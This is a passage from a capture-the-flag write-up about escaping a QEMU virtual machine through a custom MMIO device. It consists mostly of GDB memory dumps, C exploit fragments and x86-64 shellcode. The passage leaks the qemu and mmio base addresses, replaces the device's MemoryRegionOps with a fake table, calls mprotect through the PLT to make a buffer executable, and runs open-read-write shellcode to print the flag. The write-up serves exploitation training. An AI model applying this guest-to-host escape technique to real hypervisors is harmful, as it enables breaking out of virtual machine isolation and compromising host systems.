0x5614b2679530: 0x0000000000000000      0x0000000000010001
0x5614b2679540: 0x0000000000000000      0x0000000000000000
0x5614b2679550: 0x0000000000000001      0x0000000000000000
0x5614b2679560: 0x00005614b2679558      0x00005614b26485e0
0x5614b2679570: 0x00005614b171eb98      0x0000000000000000
0x5614b2679580: 0x00005614b2679578      0x00005614b263d6a0
0x5614b2679590: 0x0000000000000000      0x0000000000000000
0x5614b26795a0: 0x0000000000000000      0x0000000000000000
0x5614b26795b0: 0x0000000000000000      0x0000000000000000
0x5614b26795c0: 0x0000000000000000      0x0000000000000000
0x5614b26795d0: 0x0000000000000000      0x0000000000000000
gef> x/30gx 0x5614b26794f0 - 0x80
0x5614b2679470: 0x0000000000000000      0x0000000000000000
0x5614b2679480: 0x0000000000000000      0x0000000000000000
0x5614b2679490: 0x0000000000000000      0x0000000000000000
0x5614b26794a0: 0x00005614b174cd90      0x0000000000000000
0x5614b26794b0: 0x00005614b25eaf60      0x0000000000000001
0x5614b26794c0: 0x00005614b2678a70      0x0000000000000001
0x5614b26794d0: 0x0000000000000000      0x0000000000000000
0x5614b26794e0: 0x00005614b2678a70      0x00005614b2678a70
0x5614b26794f0: 0x00005614b0eaf460      0x00005614b2678a70
0x5614b2679500: 0x00005614b171eae0      0x0000000000000000
0x5614b2679510: 0x0000000000010000      0x0000000000000000
0x5614b2679520: 0x00000000febb0000      0x00005614b00b5320
0x5614b2679530: 0x0000000000000000      0x0000000000010001
0x5614b2679540: 0x0000000000000000      0x0000000000000000
0x5614b2679550: 0x0000000000000001      0x0000000000000000

There we can identify the pointer to parent_obj, which is the one that begins the structure:

gef> x/50gx 0x5614b26794a0
0x5614b26794a0: 0x00005614b174cd90      0x0000000000000000
0x5614b26794b0: 0x00005614b25eaf60      0x0000000000000001
0x5614b26794c0: 0x00005614b2678a70      0x0000000000000001
0x5614b26794d0: 0x0000000000000000      0x0000000000000000
0x5614b26794e0: 0x00005614b2678a70      0x00005614b2678a70
0x5614b26794f0: 0x00005614b0eaf460      0x00005614b2678a70
0x5614b2679500: 0x00005614b171eae0      0x0000000000000000
0x5614b2679510: 0x0000000000010000      0x0000000000000000
0x5614b2679520: 0x00000000febb0000      0x00005614b00b5320
0x5614b2679530: 0x0000000000000000      0x0000000000010001
0x5614b2679540: 0x0000000000000000      0x0000000000000000
0x5614b2679550: 0x0000000000000001      0x0000000000000000
0x5614b2679560: 0x00005614b2679558      0x00005614b26485e0
0x5614b2679570: 0x00005614b171eb98      0x0000000000000000
0x5614b2679580: 0x00005614b2679578      0x00005614b263d6a0
0x5614b2679590: 0x0000000000000000      0x0000000000000000
0x5614b26795a0: 0x0000000000000000      0x0000000000000000
0x5614b26795b0: 0x0000000000000000      0x0000000000000000
0x5614b26795c0: 0x0000000000000000      0x0000000000000000
0x5614b26795d0: 0x0000000000000000      0x0000000000000000
0x5614b26795e0: 0x0000000000000000      0x0000000000000000
0x5614b26795f0: 0x0000000000000000      0x0000000000000000
0x5614b2679600: 0x0000000000000000      0x0000000000000000
0x5614b2679610: 0x0000000000000000      0x0000000000000000
0x5614b2679620: 0x0000000000000000      0x0000000000000000

And here we see a pointer at address 0x5614b2679580 that has a value of 0x5614b2679578 (almost the same as the address where it is stored). This value appears at index 58 of the array, and it points 0xd8 bytes past the start of the mmio structure (0x5614b2679578 - 0x5614b26794a0 = 0xd8). We can use this value to calculate the exact address of the mmio structure:

#define QUEMEMU_MMIO_ADDRESS_INDEX 58

  uint64_t qemu_base_addr = data[QUEMEMU_MMIO_OPS_INDEX] - QUEMEMU_MMIO_OPS_OFFSET;
  uint64_t mmio_base_addr = data[QUEMEMU_MMIO_ADDRESS_INDEX] - 0xd8;
  printf("[+] qemu base address: 0x%lx\n", qemu_base_addr);
  printf("[+] mmio base address: 0x%lx\n\n", mmio_base_addr);

Arbitrary code execution

At this point, we have control over the mmio->ops address, which currently contains the following function table:

gef> p quememu_mmio_ops
$1 = {
  read = 0x5614afde03e0 <quememu_mmio_read>,
  write = 0x5614afde0360 <quememu_mmio_write>,
  read_with_attrs = 0x0,
  write_with_attrs = 0x0,
  endianness = DEVICE_NATIVE_ENDIAN,
  valid = {
    min_access_size = 0x4,
    max_access_size = 0x4,
    unaligned = 0x0,
    accepts = 0x0
  },
  impl = {
    min_access_size = 0x4,
    max_access_size = 0x4,
    unaligned = 0x0
  }
}

What we can do is create a fake MemoryRegionOps structure in the buffer and make mmio->ops point to it. So, every time a read or write is executed, the device will execute the functions that we tell it, and not those defined in the module.

In this situation, we have two options:

Use a ROP chain to run open-read-write instructions to read the flag
Use open-read-write shellcode to read the flag and make it executable with mprotect

The first option is not very practical here because there are no good gadgets to perform a stack pivot, so we will use the second option.

The key here is to put mprotect in the write function, since we have the ability to control $rdi, $rsi and $rdx (the first three arguments of a function call). The write callback is called as write(opaque, addr, val, size), so to set $rdi we have to change the value of opaque (which is next to the mmio->ops pointer). Then, $rsi is the offset (addr) at which we write inside the MMIO region, and $rdx is the value val that we write.

We could be tempted to run system("/bin/sh"), but we can’t because there are seccomp rules that block it.

So, with this we can create a shellcode as the following (it would be necessary to modify it for the remote execution, since the flag is found in /home/user/flag):

pop  rbx
xor  rsi, rsi
xor  rax, rax
push rsi
push rsi
mov  rdi, 0x67616c66  # "flag" as hexadecimal number
push rdi
mov  rdi, rsp
mov   al, 2
syscall               # int fd = open("flag", 0);

mov  rdx, 0x64
mov  rsi, rsp
mov  edi, eax
xor   al, al
syscall               # read(fd, data, 0x64);

mov   al, 1
mov  rdi, rax
syscall               # write(1, data, 0x64);

pop  rax
pop  rax
pop  rax
push rbx
ret
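For the remote target, the path /home/user/flag no longer fits in a single 32-bit constant, so it has to be pushed in several 8-byte pieces. The following sketch computes those pieces; path_to_qwords is a hypothetical helper of ours, not something from the original exploit.

```python
def path_to_qwords(path):
    """Split a NUL-terminated path into 8-byte little-endian integers, last chunk first."""
    data = path + b"\x00"
    data += b"\x00" * (-len(data) % 8)  # pad to a multiple of 8 bytes
    chunks = [data[i:i + 8] for i in range(0, len(data), 8)]
    return [int.from_bytes(c, "little") for c in reversed(chunks)]


for value in path_to_qwords(b"/home/user/flag"):
    print(hex(value))
```

The values come out in push order: each one would be loaded into a register and pushed, so that the string ends up contiguous on the stack with rsp pointing at its first byte. If the number of pushes changes, the pops at the end of the shellcode would have to be adjusted to match.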

Using asm from pwntools we can get the shellcode as a list of bytes. Now we put it in the exploit and copy it into the virtual buffer at an arbitrary offset (index 0x80 of data, since data is a uint64_t pointer):

  uint8_t shellcode[] = { 91, 72, 49, 246, 72, 49, 192, 86, 86, 72, 199, 199, 102, 108, 97, 103, 87, 72, 137, 231, 176, 2, 15, 5, 72, 199, 194, 100, 0, 0, 0, 72, 137, 230, 137, 199, 48, 192, 15, 5, 176, 1, 72, 137, 199, 15, 5, 88, 88, 88, 83, 195 };
  memcpy(data + 0x80, shellcode, sizeof(shellcode));

On the other hand, we have to find the offset of mprotect in the PLT of qemu to be able to call the function:

# objdump -M intel -d qemu-system-x86_64 | grep mprotect@plt
000000000031fff0 <mprotect@plt>:
  424ed1:       e8 1a b1 ef ff          call   31fff0 <mprotect@plt>
  424ee2:       e8 09 b1 ef ff          call   31fff0 <mprotect@plt>
  8fa39e:       e8 4d 5c a2 ff          call   31fff0 <mprotect@plt>
  900564:       e8 87 fa a1 ff          call   31fff0 <mprotect@plt>
  9327b6:       e8 35 d8 9e ff          call   31fff0 <mprotect@plt>

And so, we have the address of mprotect:

#define MPROTECT_PLT_OFFSET 0x31fff0

  uint64_t mprotect_plt_addr = qemu_base_addr + MPROTECT_PLT_OFFSET;

The last thing left is to create our fake MemoryRegionOps structure, modify the mmio->ops pointer and set the new value of opaque:

  data[QUEMEMU_MMIO_OPS_INDEX] = mmio_base_addr + (70 - QUEMEMU_MMIO_PARENT_OBJ_INDEX) * 8;
  data[QUEMEMU_MMIO_OPAQUE_INDEX] = mmio_base_addr & ~0xfff;
  data[70] = mmio_base_addr + (0x80 - QUEMEMU_MMIO_PARENT_OBJ_INDEX) * 8;
  data[71] = mprotect_plt_addr;

  set_buff();

A few points to highlight: the fake MemoryRegionOps structure is placed at index 70. That is, the read function is at index 70 and the write function is at index 71. As expected, the former contains the address of the shellcode and the latter contains the address of mprotect in the PLT.

Another interesting point is that the address that goes into opaque is the base address of the mmio structure with the last three hexadecimal digits zeroed, because mprotect requires a page-aligned address.

Finally, note how the relationship between our indexes and those of the device is relevant to put the right values where we want.

Once set_buff has been executed, the structure should have changed. We can check it in GDB:

gef> x/50gx 0x56119210c4a0
0x56119210c4a0: 0x00005611911dfd90      0x0000000000000000
0x56119210c4b0: 0x000056119207df60      0x0000000000000001
0x56119210c4c0: 0x000056119210ba70      0x0000000000000001
0x56119210c4d0: 0x0000000000000000      0x0000000000000000
0x56119210c4e0: 0x000056119210ba70      0x000056119210ba70
0x56119210c4f0: 0x000056119210c5e0      0x000056119210c000
0x56119210c500: 0x00005611911b1ae0      0x0000000000000000
0x56119210c510: 0x0000000000010000      0x0000000000000000
0x56119210c520: 0x00000000febb0000      0x000056118eb94320
0x56119210c530: 0x0000000000000000      0x0000000000010001
0x56119210c540: 0x0000000000000000      0x0000000000000000
0x56119210c550: 0x0000000000000001      0x0000000000000000
0x56119210c560: 0x000056119210c558      0x00005611920db5e0
0x56119210c570: 0x00005611911b1b98      0x0000000000000000
0x56119210c580: 0x000056119210c578      0x00005611920d06a0
0x56119210c590: 0x0000000000000000      0x0000000000000000
0x56119210c5a0: 0x0000000000000000      0x0000000000000000
0x56119210c5b0: 0x0000000000000000      0x0000000000000000
0x56119210c5c0: 0x0000000000000000      0x0000000000000000
0x56119210c5d0: 0x0000000000000000      0x0000000000000000
0x56119210c5e0: 0x000056119210c7b0      0x000056118e7b6ff0
0x56119210c5f0: 0x0000000000000000      0x0000000000000000
0x56119210c600: 0x0000000000000000      0x0000000000000000
0x56119210c610: 0x0000000000000000      0x0000000000000000
0x56119210c620: 0x0000000000000000      0x0000000000000000
gef> x/2gx 0x000056119210c5e0
0x56119210c5e0: 0x000056119210c7b0      0x000056118e7b6ff0
gef> x/8gx 0x000056119210c7b0
0x56119210c7b0: 0x56c03148f631485b      0x67616c66c7c74856
0x56119210c7c0: 0x050f02b0e7894857      0x4800000064c2c748
0x56119210c7d0: 0x050fc030c789e689      0x58050fc7894801b0
0x56119210c7e0: 0x00000000c3535858      0x0000000000000000
gef> x/23i 0x000056119210c7b0
   0x56119210c7b0:      pop    rbx
   0x56119210c7b1:      xor    rsi,rsi
   0x56119210c7b4:      xor    rax,rax
   0x56119210c7b7:      push   rsi
   0x56119210c7b8:      push   rsi
   0x56119210c7b9:      mov    rdi,0x67616c66
   0x56119210c7c0:      push   rdi
   0x56119210c7c1:      mov    rdi,rsp
   0x56119210c7c4:      mov    al,0x2
   0x56119210c7c6:      syscall
   0x56119210c7c8:      mov    rdx,0x64
   0x56119210c7cf:      mov    rsi,rsp
   0x56119210c7d2:      mov    edi,eax
   0x56119210c7d4:      xor    al,al
   0x56119210c7d6:      syscall
   0x56119210c7d8:      mov    al,0x1
   0x56119210c7da:      mov    rdi,rax
   0x56119210c7dd:      syscall
   0x56119210c7df:      pop    rax
   0x56119210c7e0:      pop    rax
   0x56119210c7e1:      pop    rax
   0x56119210c7e2:      push   rbx
   0x56119210c7e3:      ret

And we have everything ready, just call mprotect with mmio_write and then execute the shellcode with mmio_read:

  mmio_write(0x2000, 07);
  mmio_read(0);
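It helps to spell out what mprotect actually receives from this MMIO write. The sketch below maps the callback arguments write(opaque, addr, val, size) onto mprotect(addr, len, prot) and checks that the shellcode falls inside the protected range; the helper names are ours, and the addresses are the ones from the GDB session above.

```python
PROT_READ, PROT_WRITE, PROT_EXEC = 1, 2, 4


def mprotect_args(opaque, mmio_offset, val):
    """Arguments mprotect receives when it replaces write(opaque, addr, val, size)."""
    return {"addr": opaque, "len": mmio_offset, "prot": val}


def covers(args, start, size):
    """True if [start, start + size) lies inside the range passed to mprotect."""
    return args["addr"] <= start and start + size <= args["addr"] + args["len"]


mmio_base_addr = 0x56119210C4A0
shellcode_addr = 0x56119210C7B0
args = mprotect_args(mmio_base_addr & ~0xFFF, 0x2000, 0o7)
print(hex(args["addr"]), hex(args["len"]), args["prot"], covers(args, shellcode_addr, 52))
```

So the MMIO offset 0x2000 plays the role of the length (two pages) and the written value 7 is PROT_READ | PROT_WRITE | PROT_EXEC. The fourth callback argument, size, is simply ignored by mprotect.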

Flag

And so, we achieved an exploit that prints out the flag and returns correctly from the program:

   ___             __  __
  / _ \ _   _  ___|  \/  | ___ _ __ ___  _   _
 | | | | | | |/ _ \ |\/| |/ _ \ '_ ` _ \| | | |
 | |_| | |_| |  __/ |  | |  __/ | | | | | |_| |
  \__\_\\__,_|\___|_|  |_|\___|_| |_| |_|\__,_|

-------------------------------------------------
[+]          By DiegoAltF4 and Dbd4           [+]
-------------------------------------------------

/root # /exploit
vm.nr_hugepages = 32
[*] buff virtual address  = 0x7fdbbf2eb000
[*] buff physical address = 0xafe4000

[*] base ==> 20
[*] off  ==> 0x7fff

[+] base ==> 21

[*] off  ==> 0x6f6b

[+] base ==> 16
[+] off  ==> 0xfe00

[+] qemu base address: 0x55f4968ce000
[+] mmio base address: 0x55f49a0e74a0

flag{fake_flag_4_testing}

The full exploit can be found here: exploit.c.